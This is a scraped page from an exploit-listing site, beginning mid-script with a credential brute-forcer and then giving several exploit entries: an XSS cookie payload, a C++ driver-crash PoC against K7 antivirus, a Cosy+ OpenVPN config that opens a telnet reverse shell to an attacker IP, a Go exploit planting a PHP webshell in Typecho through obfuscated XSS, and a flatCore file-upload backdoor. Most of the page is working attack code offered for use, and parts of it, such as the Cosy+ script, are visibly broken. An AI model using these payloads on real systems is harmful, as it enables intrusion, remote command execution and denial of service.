'yellow') + colored(' Password: ', 'yellow') + colored(password, 'yellow')) if r.status_code == 200: print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') + colored(' password: ', 'green') + colored(password, 'green') + colored(' server: ', 'green') + colored(server, 'green')) print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan')) print('\n') else: print(colored('403 - Unauthenticated!', 'red')) except IndexError: print(colored('Something went wrong', 'red')) if __name__ == '__main__': main()
HireHackking
# Exploit Title: CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) # Date: 2024-08-15 # Exploit Author: Raj Nandi # Vendor Homepage: https://codeastro.com/ # Software Link: https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/ # Version: 1.0 # Tested on: Any OS # CVE: CVE-2024-7815 ## Description: A Cross-Site Scripting (XSS) vulnerability exists in [Application Name/Version]. This vulnerability allows an attacker to inject and execute arbitrary JavaScript code within the context of the user's browser session. ## Proof of Concept (PoC): 1. Navigate to [vulnerable page or input field]. 2. Input the following payload: `<script>alert(document.cookie)</script>` 3. Upon execution, the script will trigger and display the user's cookies in an alert box. ## Mitigation: To prevent this vulnerability, ensure that all user inputs are properly sanitized and validated before being reflected back on the webpage.
HireHackking
# Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) # Date: 13.08.2024 # Author: M. Akil Gündoğan # Vendor Homepage: https://k7computing.com/ # Version: < v17.0.2019 # Tested on: Windows 10 Pro x64 # CVE ID: CVE-2024-36424 # Vulnerability Description: -------------------------------------- In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group. # Technical details and step by step Proof of Concept's (PoC): -------------------------------------- 1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create. 2 - Compile the attached PoC code written in C++ as release on VS 2022. 3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD. # Impact: -------------------------------------- An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system. # Advisories: -------------------------------------- K7 Computing recommends that all customers update their products to the corresponding versions shown below: K7 Ultimate Security (17.0.2019 or Higher) # Timeline: -------------------------------------- - 16.05.2024 - Vulnerability reported. - 05.08.2024 - Vendor has fixed the vulnerability. - 13.08.2024 - Released. # References: -------------------------------------- - Vendor: https://www.k7computing.com - Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417 - CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424 - Repository: https://github.com/secunnix/CVE-2024-36424 # PoC Code (C++): ------------------------------------------------------------------------------------------------------------------------- /* # Usage: Only compile it and run, boooom :) */ #include <windows.h> #include <iostream> const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014 int main() { std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl; HANDLE hDevice = CreateFile(driverDevice.c_str(), GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr); if (hDevice == INVALID_HANDLE_VALUE) { std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl; return 1; } void* inputBuffer = nullptr; // Null input buffer DWORD inputBufferSize = 0; DWORD bytesReturned; BOOL result = DeviceIoControl(hDevice, ioCTL, inputBuffer, inputBufferSize, nullptr, 0, &bytesReturned, nullptr); if (!result) { std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl; } CloseHandle(hDevice); return 0; }
HireHackking

Cosy+ firmware 21.2s7 - Command Injection

HACKER · %s · %s

# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection # Google Dork: N/A # Date: 2024-8-20 # Exploit Author: CodeB0ss # Contact: t.me/codeb0ss / uncodeboss@gmail.com # Version: 21.2s7 # Tested on: Windows 11 Home Edition # CVE: CVE-2024-33896 import socket import subprocess import time def configcreator(file_path): with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def l3st(port): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port)) server_socket.listen(1) print(f" - --> Listening_0n_port {port}") client_socket, _ = server_socket.accept() print(" - --> Recevied") while True: data = client_socket.recv(1024) if not data: break print(data.decode()) client_socket.close() server_socket.close() if name == "main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port = 5000 listener_process = subprocess.Popen(['python', '-c', f'from main import start_listener; start_listener({port})']) time.sleep(2) create_malicious_openvpn_config(config) print(f" - --> config_created {config}") GitHub: https://github.com/codeb0ss/CVE-2024-33896-PoC Hey, Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to improper neutralization of parameters read from a user-controlled configuration file, an authenticated attacker is able to inject and execute OS commands on the device. Vulnerability Details: Authenticated attackers are able to upload a custom OpenVPN configuration. This configuration can contain the OpenVPN paramaters "--up" and "--down", which execute a specified script or executable. Since the process itself runs with the highest privileges (root), this allows the device to be completely compromised.
HireHackking

Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) # Google Dork: intext:"Powered by Typecho" inurl:/index.php # Date: 18/08/2024 # Exploit Author: Michele 'cyberaz0r' Di Bonaventura # Vendor Homepage: https://typecho.org # Software Link: https://github.com/typecho/typecho # Version: 1.3.0 # Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho) # CVE: CVE-2024-35540 # For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/ package main import ( "bufio" "bytes" "crypto/rand" "crypto/sha256" "encoding/base64" "fmt" "net/http" "net/url" "os" "strings" "time" ) var ( postTitle string = "Reflected XSS PoC" postText string = "Hey admin! Look at the draft of this blog post, can I publish it?" userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" client *http.Client = &http.Client{ CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse }, } ) func getEditUrl(u string, cookies string) string { req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil) if err != nil { fmt.Println("[X] Error creating initial request:", err) return "" } req.Header.Set("Cookie", cookies) req.Header.Set("User-Agent", userAgent) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending initial request:", err) return "" } buf := new(bytes.Buffer) buf.ReadFrom(resp.Body) body := buf.String() if !strings.Contains(body, "<form action=\"") { fmt.Println("[X] Error finding post edit URL") return "" } editUrl := strings.Split(body, "<form action=\"")[1] editUrl = strings.Split(editUrl, "\"")[0] return editUrl } func generateRandomBytes() string { bytes := make([]byte, 64) rand.Read(bytes) return fmt.Sprintf("%x", sha256.Sum256(bytes)) } func getJsCode(password string) string { phpPayload := ` header("X-Random-Token: " . md5(uniqid())); if (isset($_POST["CSRFToken"]) && $_POST["CSRFToken"] === "%s") { if (isset($_POST["action"])) { system($_POST["action"]); exit; } } ` phpPayload = fmt.Sprintf(phpPayload, password) jsPayload := ` var i = document.createElement('iframe'); i.src = location.protocol+'//'+location.host+'/admin/theme-editor.php'; i.style.display = 'none'; document.body.appendChild(i); setTimeout(() => { var textarea = i.contentWindow.document.getElementById('content'); if (textarea.value.includes(payload)) return; textarea.value = textarea.value.replace(/<\?php/, '<?php ' + payload); var form = i.contentWindow.document.getElementById('theme').submit(); }, 200); ` return fmt.Sprintf("var payload = `%s`;\n%s", phpPayload, jsPayload) } func generatePayload(jsCode string) string { remainder := len(jsCode) % 3 if remainder != 0 { jsCode += strings.Repeat(" ", 3-remainder) } jsCodeEncoded := base64.StdEncoding.EncodeToString([]byte(jsCode)) return fmt.Sprintf("[<img style=\"display:none\" src=x onerror=\"eval(atob('%s'))\">][1]\n[1]: https://google.com", jsCodeEncoded) } func createPost(u string, cookies string, payload string) string { formData := url.Values{} formData.Set("title", postTitle) formData.Set("text", payload+"\n"+postText) formData.Set("do", "save") formData.Set("markdown", "1") formData.Set("category%5B%5D", "1") formData.Set("allowComment", "1") formData.Set("allowPing", "1") formData.Set("allowFeed", "1") formData.Set("dst", "60") formData.Set("timezone", "7200") req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode())) if err != nil { fmt.Println("[X] Error creating malicious post creation request:", err) return "" } req.Header.Set("Cookie", cookies) req.Header.Set("User-Agent", userAgent) req.Header.Set("Content-Type", "application/x-www-form-urlencoded") req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1)) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending malicious post creation request:", err) return "" } defer resp.Body.Close() return resp.Header.Get("Location") } func checkInjected(u string) bool { req, err := http.NewRequest("HEAD", u, nil) if err != nil { return false } req.Header.Set("User-Agent", userAgent) resp, err := client.Do(req) if err != nil { return false } return resp.Header.Get("X-Random-Token") != "" } func readInput() string { scanner := bufio.NewScanner(os.Stdin) if scanner.Scan() { return scanner.Text() } return "" } func interactiveShell(u string, password string) { for { fmt.Print("$ ") cmd := readInput() formData := url.Values{} formData.Set("CSRFToken", password) formData.Set("action", cmd) req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode())) if err != nil { fmt.Println("[X] Error creating shell request:", err) continue } req.Header.Set("User-Agent", userAgent) req.Header.Set("Content-Type", "application/x-www-form-urlencoded") req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending shell request:", err) continue } buf := new(bytes.Buffer) buf.ReadFrom(resp.Body) body := buf.String() fmt.Println(body) } } func main() { if len(os.Args) != 3 { fmt.Println("Usage: go run CVE-2024-35540.go <URL> <COOKIE_HEADER_VALUE>") os.Exit(1) } fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r") targetUrl := os.Args[1] cookies := os.Args[2] fmt.Println("[*] Getting post edit URL with CSRF token...") editUrl := getEditUrl(targetUrl, cookies) if editUrl == "" { fmt.Println("[-] Could not get post edit URL, exiting...") return } fmt.Println("[+] Edit URL:", editUrl) password := generateRandomBytes() fmt.Println("[+] Generated password to access the webshell: ", password) fmt.Println("[*] Generating JavaScript code to inject webshell...") jsCode := getJsCode(password) payload := generatePayload(jsCode) fmt.Println("[*] Creating malicious post...") postUrl := createPost(editUrl, cookies, payload) if postUrl == "" || postUrl == "/" { fmt.Println("[-] Could not create malicious post, exiting...") return } previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1) fmt.Println("[+] Malicious post created successfully!") fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl) fmt.Println("[*] Waiting for the admin to visit the preview URL...") for !checkInjected(targetUrl) { time.Sleep(1 * time.Second) } fmt.Println("[+] Webshell injected successfully!") fmt.Println("[+] Enjoy your shell ;)\n") interactiveShell(targetUrl, password) }
HireHackking

flatCore 1.5.5 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: flatCore 1.5.5 - Arbitrary File Upload # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/flatCore/flatCore-CMS # Software Link: https://github.com/flatCore/flatCore-CMS # Version: 1.5.5 # Tested on: Ubuntu Windows # CVE : CVE-2019-10652 PoC: 1) 1. Access the flatCore Admin Panel URL: http://flatcore/acp/acp.php Log in with valid administrative credentials. 2. Upload a Malicious PHP File Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel. 3. Intercept and Modify the Upload Request Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request: POST /acp/core/files.upload-script.php HTTP/1.1 Host: flatcore Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150 Content-Length: <calculated length> Cookie: PHPSESSID=<valid_session_id> -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="file"; filename="exploit.php" Content-Type: application/octet-stream <?php // Simple PHP backdoor code echo "Vulnerable File Upload - PoC"; system($_GET['cmd']); ?> -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="upload_destination" ../content/files -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="csrf_token" <valid_csrf_token> -----------------------------735323031399963166993862150 Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session. 4. Verification After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami PoC 2) # PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7 # Target URL: http://flatcore/ # The attacker must be authenticated as an administrator to exploit this vulnerability # Step 1: Log in as an administrator and obtain the CSRF token # You need to obtain the CSRF token manually or through a script since the token is required for the file upload. # Step 2: Upload a malicious PHP file using the file upload feature # Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php echo "<?php phpinfo(); ?>" > shell.php # Upload the PHP file using cURL curl -X POST "http://flatcore/acp/core/files.upload-script.php" \ -H "Content-Type: multipart/form-data" \ -F "file=@shell.php" \ -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \ -F "upload_destination=../content/files" \ -F "file_mode=overwrite" \ -b "PHPSESSID=YOUR_SESSION_ID_HERE" # Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID # Step 3: Access the uploaded malicious PHP file echo "Visit the following URL to execute the uploaded PHP file:" echo "http://flatcore/content/files/shell.php" This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server. [Replace Your Domain Name]